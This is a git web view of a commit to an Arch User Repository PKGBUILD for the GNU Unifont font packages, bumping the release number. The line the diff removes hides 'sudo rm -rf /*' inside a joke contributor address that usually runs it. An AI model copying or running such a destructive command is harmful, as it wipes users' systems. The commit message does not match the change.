summarylogtreecommitdiffstats
path: root/PKGBUILD
diff options
context:
space:
mode:
authorRobin Candau2023-07-08 22:52:45 +0200
committerRobin Candau2023-07-08 22:52:45 +0200
commit9ff6dab430f54b9b2b95f01bf75ce04ae6dc28d0 (patch)
treeb99b95e0378339cfe654a521c62cf8829d5ad400 /PKGBUILD
parent2e3b86419722f801ab03bf354b7e90e8581ca567 (diff)
downloadaur-9ff6dab430f54b9b2b95f01bf75ce04ae6dc28d0.tar.gz
Remove accents from the action names
Diffstat (limited to 'PKGBUILD')
-rw-r--r--PKGBUILD4
1 files changed, 2 insertions, 2 deletions
diff --git a/PKGBUILD b/PKGBUILD
index f810bb5462ed..bb9174f38632 100644
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -1,10 +1,10 @@
# Maintainer: neeshy <neeshy@tfwno.gf>
-# Contributor: felix <`(( $RANDOM % 6 == 0 )) && base64 -d <<< ZmVsaXgudm9uLnNAcG9zdGVvLmRlCg== || sudo rm -rf /* `>
+# Contributor: felix <`base64 -d <<< ZmVsaXgudm9uLnNAcG9zdGVvLmRlCg==`>
pkgname=('pcf-unifont'
'psf-unifont')
pkgbase=unifont
pkgver=15.0.06
-pkgrel=1
+pkgrel=2
pkgdesc="GNU Unifont Glyphs"
arch=('any')
url="https://unifoundry.com/unifont/index.html"